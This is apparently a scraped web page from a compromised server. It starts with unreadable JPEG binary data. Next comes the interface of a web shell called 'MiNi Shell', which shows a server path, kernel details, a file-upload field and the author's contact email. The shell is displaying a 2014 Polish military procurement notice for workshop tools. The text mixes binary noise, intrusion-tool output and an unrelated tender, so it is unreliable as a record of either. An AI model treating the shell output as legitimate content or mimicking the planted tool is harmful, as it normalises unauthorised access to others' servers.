JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/220535-N-2014.html

<p class="kh_header"><b>Poznań: ZAKUP NARZĘDZI RĘCZNYCH, ELEKTRONARZĘDZI i URZĄDZEŃ WARSZTATOWYCH DLA PODODDZIAŁÓW NAPRAWCZYCH</b><br>
<b>Numer ogłoszenia: 220535 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 14 Wojskowy Oddział Gospodarczy , ul. Bukowska 34, 60-811 Poznań, woj. wielkopolskie, tel. 61 857 48 02, faks 61 857 72 04.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP NARZĘDZI RĘCZNYCH, ELEKTRONARZĘDZI i URZĄDZEŃ WARSZTATOWYCH DLA PODODDZIAŁÓW NAPRAWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup narzędzi ręcznych,  elektronarzędzi i urządzeń warsztatowych dla pododdziałów  naprawczych do zabezpieczenia potrzeb                    warsztatu remontowego GZ Poznań 14 Wojskowego Oddziału Gospodarczego                          i pododdziałów naprawczych Centrum Szkolenia Wojsk Lądowych, oraz zakup narzędzi i sprzętu transportowego na potrzeby służb uzbrojenia i elektroniki i transportu i ruchu wojsk w ilościach i asortymencie wymienionym w załączniku nr 5 (5/1, 5/2, 5/3, 5/4, 5/5, 5/6, 5/7) do SIWZ tj. formularzach cenowych oraz zgodnych z wymaganiami eksploatacyjno - technicznymi dotyczącymi przedmiotu zamówienia zawartymi                      w załączniku nr 6 do SIWZ.
2.	Oferowane urządzenia warsztatowe, narzędzia i elektronarzędzia zwane dalej towarem muszą  w pełni odpowiadać wymaganiom określonym w załączniku nr 6 do SIWZ Wymagania Eksploatacyjno -Techniczne w szczególności do zapisów określających wymagania dotyczące jakości i przeznaczenia oferowanych produktów.
3	Wykonawca dostarczy towar fabrycznie nowy, nieużywany w gatunku I.
4 Dostarczony przez Wykonawcę towar musi posiadać oznakowanie CE oraz certyfikat zgodności lub deklarację zgodności.
5	Dostarczone towary powinny być wykonane zgodnie z Polskimi Normami (PN), lub zamiennie dyrektywami UN, oraz posiadać wymagane certyfikaty bezpieczeństwa.
6	Zgodność z Polskimi Normami lub zamiennie dyrektywami UN powinny być potwierdzone certyfikacjami, homologacjami itp.
7	Dostarczone urządzenia, narzędzia i elektronarzędzia powinny być dostarczone w opakowaniu producenta (tam gdzie występują), zakonserwowane metodą zapewniającą ich przechowywanie     w warunkach magazynowych:
a)	dla wyrobów metalowych: 60 miesięcy
b)	dla wyrobów gumowych i wykonanych z tworzywa sztucznego: 24 miesiące
c)	dla pozostałych wyrobów: 24 miesiące.
8	Dostawa zamówionych towarów tj. urządzeń, narzędzi i elektronarzędzi nastąpi na koszt i ryzyko Wykonawcy w miejsce wskazane przez Zamawiającego (tj. magazyn służby czołgowo - samochodowej 14 WOG, 60-716 Poznań ul. Wojska Polskiego 86/90).
9	Wymagany okresy gwarancji musi być zgodny z wymogami zawartymi w załączniku nr 6 do SIWZ tj. wymaganiach eksploatacyjno - technicznych.
10	Wykonawca musi zapewnić naprawę gwarancyjną i pogwarancyjną w okresie 14 dni od daty zgłoszenia awarii.
11 Wykonawca zobowiązany jest do podania (wpisania) dla każdej pozycji towaru                  w formularzu cenowym załącznik nr 5 (5/1, 5/2, 5/3, 5/4, 5/5, 5/6, 5/7) do SIWZ                          w rubryce Nazwa producenta, typ oznaczenie oferowanego towaru (np. nazwa producenta, numer katalogowy, typ, model, itp.), który w sposób jasny i czytelny, umożliwi jego jednoznaczną i precyzyjną identyfikację celem weryfikacji                          i sprawdzenia przez Zamawiającego zgodności oferowanego towaru z wymaganiami przedmiotowymi zgodnie z załącznikiem nr 6 do SIWZ.
12	Zamawiający dopuszcza możliwość zwiększenia ilości asortymentu będącego przedmiotem zamówienia (umowy) w poszczególnych zadaniach w ramach prawa opcji według poniższego opisu:
a)	zadanie nr 3 o kwotę  15 000,00 zł netto;
b)	zadanie nr 4 o kwotę  15 000,00 zł netto;
pod warunkiem zwiększenia się zapotrzebowania na określone towary niezbędne do prawidłowego funkcjonowania, oraz posiadania na ten cel planu finansowego przez Zamawiającego. 
13	Wymagany termin realizacji zamówienia - Realizacja zamówienia podstawowego nastąpi w terminie od dnia podpisania umowy do 17 grudnia 2014 r.
Realizacja zamówienia (dostawa towaru wraz z fakturą) w ramach prawa opcji nastąpi do dnia 17 grudnia 2014 roku.
14	Ilekroć w opisie przedmiotu zamówienia jest użyte słowo lub równoważny Zamawiający rozumie przez to że oferowany produkt posiada równą (taką samą) lub wyższą wartość użytkową czyli cechuje się taką sprawnością w użytkowaniu, zwłaszcza pod względem wydajności, trwałości, skuteczności użycia zgodnie                       z przeznaczeniem, a także posiada takie same lub wyższe cechy jakościowo - użytkowe właściwe produktowi wskazanemu, oraz posiada takie same lub wyższe parametry techniczno - użytkowe..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.51.10.00-5, 31.10.00.00-7, 31.20.00.00-8, 38.90.00.00-4, 42.10.00.00-0, 42.65.20.00-1, 42.90.00.00-5, 39.15.10.00-5, 34.90.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie  publiczne z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie  publiczne z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie  publiczne z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie  publiczne z art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie  publiczne z art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wybrany wykonawca zobowiązany będzie do dostarczenia wraz z dostawą niżej wymienione dokumenty dla poszczególnych towarów zgodnie z opisem zawartym w wymaganiach eksploatacyjno - technicznych zawartych w załączniku nr 6 do SIWZ):
a)	Wykonawca zobowiązany jest dostarczyć do każdego przedmiotu zamówienia (jeżeli występuje) oryginalną dokumentację techniczną, instrukcję użytkowania oraz kopię certyfikatu zgodności lub deklarację zgodności. Dostarczone dokumenty muszą być w języku polskim;
b)	Wykonawca zobowiązany jest dostarczyć karty gwarancyjne:
na wyroby identyfikowalne (posiadające nr seryjne lub inne cechy identyfikowalności). Dostarczone karty gwarancyjne muszą zawierać informację o warunkach udzielonej gwarancji i o sposobie postępowania w przypadku konieczności uruchomienia procedury gwarancyjnej.
2. Oferta musi zawierać:
a)	formularz oferty, stanowiący załącznik nr 1 do SIWZ,
b)	formularz cenowy, stanowiący załącznik nr 5  (5/1- zadanie 1; 5/2 - zadanie 2; 5/3 - zadanie 3, 5/4 - zadanie 4, 5/5 - zadania 5, 5/6 - zadanie 6, 5/7 - zadanie 7) do SIWZ,
c)	pełnomocnictwo w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia  o wpisie do ewidencji działalności gospodarczej,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.14wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 14 Wojskowy Oddział Gospodarczy, ul. Bukowska 34 , 60-811 Poznań Sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 09:00, miejsce: 14 Wojskowy Oddział Gospodarczy, ul. Bukowska 34 , 60-811 Poznań..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MOBILNE URZĄDZENIA ROZRUCHOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MOBILNE URZĄDZENIA ROZRUCHOWE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.10.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NARZĘDZIA RĘCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NARZĘDZIA RĘCZNE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> URZĄDZENIA WARSZTATOWE I ELEKTRONARZĘDZIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> URZĄDZENIA WARSZTATOWE I ELEKTRONARZĘDZIA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.20.00.00-8, 38.90.00.00-4, 42.10.00.00-0, 42.65.20.00-1, 42.90.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MEBLE WARSZTATOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MEBLE WARSZTATOWE.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> SPRZĘT OŚWIETLENIOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SPRZĘT OŚWIETLENIOWY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.20.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> SPRZĘT TRANSPORTOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SPRZĘT TRANSPORTOWY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.90.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> NARZĘDZIA RĘCZNE - SŁUŻBA UZBROJENIA I ELEKTRONIKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NARZĘDZIA RĘCZNE - SŁUŻBA UZBROJENIA I ELEKTRONIKI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com